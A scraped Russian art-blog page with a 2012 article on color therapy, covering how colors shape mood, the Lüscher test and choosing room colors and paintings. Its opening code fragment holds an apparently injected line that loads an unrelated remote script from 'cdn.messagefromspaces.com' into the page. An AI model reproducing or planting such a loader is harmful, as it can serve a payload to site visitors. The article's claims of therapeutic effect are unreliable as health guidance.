, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Цветотерапия

Автор: Наталья Юрова | 01 Окт 2012

ЦветотерапияВ наше время медицина развивается семимильными шагами. Нетрадиционная медицина также не стоит на месте, удивляя нас не только различными видами терапии, но и главное – эффективным действием, положительным результатом.

Одним из  многих интересных направлений является цветотерапия.

Терапевтический эффект арт-терапии достигается воздействием внешнего цвета. Это может быть окрашенный источник света (цветная лампа), детали интерьера, подобранные в цветовой гамме в унисон  помещению, цветные стены, разноцветная мозайка стекла, картины… Восприятие цвета через зрение воздействует  на эмоциональное состояние, изменяя его.

Посмотрим вокруг. Даже природа имеет «разумную» цветовую гамму. Летом все становится ярко зеленым. А мы знаем, что зеленый цвет (особенно его светлые тона)  - символ жизни. Он гармонизирует, наполняет нас энергией. Если говорить о небе - оно чаще голубое. Голубой цвет действует умиротворяюще, поэтому не случайно, когда оно становится серым и блеклым, у нас начинает портиться настроение.

Цветотерапия радугаА вот целая гамма ярких цветов положительно будоражит, радует. Радуга, бабочки, цветы показывают нам целый спектр цветов!  Интересно и то, что слово «цветы», которые мы все так любим, произошло от греческого «anthos» - «цвет». По сути, «цветы» - это «много цвета». Пёстрость ассоциируется у нас с детством (разноцветные игрушки), с праздником (шарики, подарки), с летним отпуском («солнце, небо и вода»)…  То есть, с хорошим настроением.

Пространство не терпит пустоты. И как же это разумно, что самые  большие «части материи» (небо, море, растения) имеют цвета, которые действуют на нас положительно! Невозможно себе представить небо красным, а растительность – фиолетовой…

Цветотерапия заборВ цветотерапии важна и яркость, насыщенность цвета. Когда солнце светит ярко – все краски в природе становятся сочными, насыщенными, и мы чувствуем себя полными энергии.  Если же солнце прячется за тучами или клонится за горизонт, цветовая гамма вокруг бледнеет, и мы становимся вялыми, медлительными. А вот когда наступает ночь – мы и вовсе не видим никаких цветов (или, вернее, видим только черный), и «теряемся в пространстве и времени».

Следовательно, можно утверждать, что наши эмоции напрямую связаны с цветом. Если целенаправленно заниматься цветотерапией, то можете возвратить себе положительные эмоции, а вместе с ними  - хорошее настроение, которое напрямую связано с нашей работоспособностью, уверенностью в себе, успехом.

Определить эмоциональное состояние, многим из вас знакомый, поможет тест Люшера. Суть его в том, что человек (следуя определенной схеме) поочередно выбирает карточки с разными цветами, в зависимости от личных пристрастий. По окончании тестирования психолог делает заключение относительно его эмоционального состояния, так как выбор цвета совершается на эмоциональном уровне.

Чтобы цветотерапия воздействовала постоянно, но не была навязчивой, окружайте себя «правильными» цветами. Цветотерапия ЛесНапример, комнату на северной стороне стоит оформить в теплых (солнечных) цветах, а детскую – обязательно в светлых тонах с ярким орнаментом. Цветущие растения – также отличный способ зарядиться энергией, а попутно - украсить помещение. Ну и не заменимыми остаются картины. Выбирайте их в такой цветовой гамме, которая поднимет вам настроение. Вспомните событие, которое вас очень обрадовало… А теперь попробуйте окрасить его в цвет (или гамму цветов), для чего возьмите краски (акварель ил гуашь) и запечатлейте его на бумаге! Лучше вас ваше радужное настроение не сможет нарисовать ни один художник! И помните, что главное в таком рисунке не форма, а содержание! И кто знает, не родится ли в вас Малевич, рисующий … цветные квадраты.

Темы: Изобразительное искусство, картины для интерьера | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress